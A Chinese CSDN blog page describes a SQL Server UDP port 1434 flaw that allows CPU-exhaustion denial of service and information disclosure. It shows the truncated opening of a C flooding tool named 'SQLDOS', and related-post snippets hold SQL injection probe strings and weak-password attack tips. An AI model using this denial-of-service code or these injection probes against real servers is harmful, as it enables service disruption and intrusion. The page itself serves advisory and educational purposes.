构造特殊的UDP数据包能造成SQL Server服务器CPU负荷加重漏洞

最新推荐文章于 2020-08-18 17:59:10 发布
最新推荐文章于 2020-08-18 17:59:10 发布
阅读量804 收藏
点赞数
分类专栏: Visual C++ 文章标签: sql server 服务器 socket 数据库服务器 email tcp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/johnny_83/article/details/1713084
版权
漏洞描述:
    由于SQL Server对1434端口的UDP没有限制,构造特殊的UDP包,SQL Server就一定会作出回应。如果收到大量的这些UDP包,SQL Server将消耗CPU,来处理这些UDP回应,虽然这不能造成主机当机等严重影响,但是CPU使用率将很容易达到100%,从而造成数据库服务器负荷加重,对其他服务(比如WEB)能造成拒绝服务。同时,恶意攻击者只需要对SQL Server发送一个1个字节的UDP数据,SQL Server将到处发送自己的数据库服务器信息。

解决办法:
    暂时没有


测试程序:

// SQLDOS.cpp
//


//                                                   
// SQLDOS by refdom
//
// Author: refdom.
// Email: refdom@263.net
//


#include "stdafx.h"
#include <string.h>
#include <stdio.h>

void sendudp (void* v)
{
    int i;
    char buf[1]={'/x02'};
    SOCKADDR_IN addr_in;
    char *targetip;
    targetip=(char*)v;

    SOCKET sock;
最低0.47元/天 解锁文章
johnny_83
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL Server查询数据
m0_67879025的博客
03-09 1354
SQL Server简介: SQL ServerMicrosoft开发的一个关系数据库管理系统(RDBMS),现在是世界上最为常用的数据库之一; SQL(Structured Query Language:结构化查询语言) 是用于管理关系数据库管理系统,SQL的范围包括数据插入、查询、更新和删除,数据库模式创建和修改,以及数据访问控制。 SQL语言是集DDL、DML和DCL与一体的数据库语言: ·DDL:定义数据库 ·DML:操纵数据库 ·DCL:数据权限控制 SQL语言主要由以下9个单词引.
MSF---MSSQL漏洞发现
weixin_46297209的博客
09-26 1473
msf关于mssql漏洞发现
udp获取局域网上的sqlserver服务器信息
我的专栏
09-07 1181
udp端口1434,向广播地址255.255.255.255发送二进制数据0x02,未禁止或限制tcp/ip的sqlserver 数据库服务器会回应服务器名等相关信息.具体一试便知。 
UDP服务器存入SQL
09-17
UDP服务器的实现!里面可以进行多个客户端进行通信,通信后的数据将存入到数据库!同时也将会在页面上进行显示!显示分为listview 和 textbox显示两种!仅供参考学习!
UDP_Server.rar_UDP服务器_udp server
09-19
UDP服务器是基于UDP协议实现的网络服务端程序,用于接收和发送UDP数据包。下面我们将深入探讨UDP服务器的工作原理、实现方式以及相关的编程技术。 1. UDP协议特点: - 无连接:在发送数据前,UDP不建立连接,而是...
server_udp.rar_UDP服务器_udp server
09-21
UDP(User Datagram Protocol...总的来说,"server_udp.rar"提供了一个完整的UDP服务器实现,对于学习网络编程和UDP协议的使用非常有价值。通过分析和调试这个项目,开发者可以深入了解网络通信的基础和UDP协议的特点。
扫描器篇(五)之scapy构造UDP数据包完成主机发现
01-20
udp协议扫描 发现原理 向目标主机发送一个,没有开放的端口发送数据,目标主机会返回一个ICMP 目标端口不可达的消息,通过该特征可以对主机...通过python发包神器scapy构造UDP数据包 端口一定要选择没有开放的,不然
UDP.rar_UDP数据包传输
09-20
3. **无流量控制**:UDP不进行流量控制,可能导致接收方来不及处理发送方的数据,造成数据丢失。 4. **无拥塞控制**:同样,UDP不提供拥塞控制,网络拥塞时可能导致数据包大量丢失。 5. **小头部开销**:UDP头部只有...
利用MATLAB实时接收UDP数据包(ARP连接).zip
11-10
MATLAB作为一个强大的数值计算和数据分析工具,也能用于实时处理网络数据,如本例所示,通过MATLAB实现对UDP数据包的实时接收和ARP连接的建立。 UDP是一种无连接的、不可靠的传输协议,它不保证数据包的顺序、不...
使用sql2008 发送udp消息
az44yao的专栏
07-27 477
一 visual studio 中新建 数据库 项目 项目中新建项 SQLSERVER CLR C#用户自定义函数 二 自定义函数内容 using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer....
SQL Server 连接问题-TCP/IP
java开发指南博客 【转载】
08-18 567
出自:http://blogs.msdn.com/b/apgcdsd/archive/2012/02/24/ms-sql-server-tcp-ip.aspx TCP/IP的基本工作原理这里就不浪费口水了。现在这网络年代,谁不知道TCP/IP啊。不要跟我抬杠说你偏就没听说过TCP/IP阿,真是这样那你得自己去补补课了。 TCP/IP协议有两个基本的东西,一个是IP地址, 另一个是端口号。 ...
08Microsoft SQL Server 数据查询
weixin_30388677的博客
05-15 241
Microsoft SQL Server 数据查询 单表查询所有列 --查询所有行所有列 select all * from table; --查询不重复行的所有列 select distinct * from table; --查询前n行所有列 select top n * from table; --查询前n%行所有列 select top n percent * fr...
SQL Server数据库常见漏洞总结和渗透测试,附 sqlserver sa帐户无法连接
爱上卿的博客
01-22 6052
SQL Server渗透测试方法 1.默认端口:1433(Server 数据库服务)、1434(Monitor 数据库监控)、(ms-sql-hidden    2433/tcp) 2.弱口令 Msf或者Scansql扫描器扫描SA用户空/弱口令,弱口令获得之后运用SQLtools或者sql server分析器等进行连接,然后进行上传、查询和执行相关操作。 以SA用户通过SQL Serve...
SQL Server 安全漏洞评估工具
三空道人的博客
08-18 1184
为避免SQL Server遭受攻击,组织必须不断评估数据库系统来确定是否存在漏洞。这是一种有效的主动防御方法,用于分析数据库中的潜在漏洞及其与标准设置的偏差,如太大的权限、敏感数据的暴露、错误配置等。这也是满足遵循法规的需求。 安全合规,辨别确认安全漏洞对组织来说是非常重要的。一些可能的数据库漏洞: 用户和组权限过大 敏感数据,如信用卡、银行账户等 SQL注入 实例或数据库配置 孤立数据库用户、角色或组 此前,使用SQL Server,我们需要使用自定义.
针对sqlserversql注入漏洞(sqlsverver版)
白瞳洛的博客
08-11 906
从上往下一直走-->(下面的纯手打,注意中英文符号) id=1-1 and 1=1是否存在漏洞 id=1-1 and exists(select * from sysobjects) --判断数据库类型 id=1-1 and (select @@version)>0 --判断数据库的版本 id=1-1 and (select db_name()) --判断数据库名称 id=1-1 order by 1/....../10.... --判断字段有多少 报错(超出xxx个字段) id=...
SQL注入漏洞与参数化查询
baiseda
10-02 214
看杨中科老师的公开课,记下笔记~ 顺便了解了一下SQL注入漏洞 SQL注入攻击的本质:让客户端传递过去的字符串变成SQL语句,而且能够被执行。 查询的一种方式: using (SqlConnection conn = new SqlConnection(@"Data Source=.\SQLEXPRESS;AttachDBFilename=|DataDirectory|\Database1...
构造udp数据包
最新发布
05-27
构造UDP数据包需要以下步骤: 1. 创建一个Socket对象,指定socket类型为SOCK_DGRAM。 2. 准备目标主机的IP地址和端口号。 3. 使用结构体sockaddr_in来存储目标主机的IP地址和端口号,并初始化这个结构体。 4. 准备要发送的数据,存储在一个字符数组中。 5. 调用sendto函数发送UDP数据包,将目标主机的地址结构体作为参数传入。 下面是一个示例代码: ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define BUF_SIZE 1024 int main(int argc, char *argv[]) { int sockfd; struct sockaddr_in dest_addr; char buf[BUF_SIZE]; // 创建socket sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) { perror("socket error"); exit(1); } // 准备目标主机的IP地址和端口号 memset(&dest_addr, 0, sizeof(dest_addr)); dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(1234); if (inet_pton(AF_INET, "192.168.1.100", &dest_addr.sin_addr) != 1) { perror("inet_pton error"); exit(1); } // 准备要发送的数据 strcpy(buf, "Hello, UDP!"); // 发送UDP数据包 if (sendto(sockfd, buf, strlen(buf), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) < 0) { perror("sendto error"); exit(1); } close(sockfd); return 0; } ``` 在这个示例中,我们创建了一个UDP Socket,并将其发送到IP地址为192.168.1.100,端口号为1234的目标主机。发送的数据是"Hello, UDP!"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值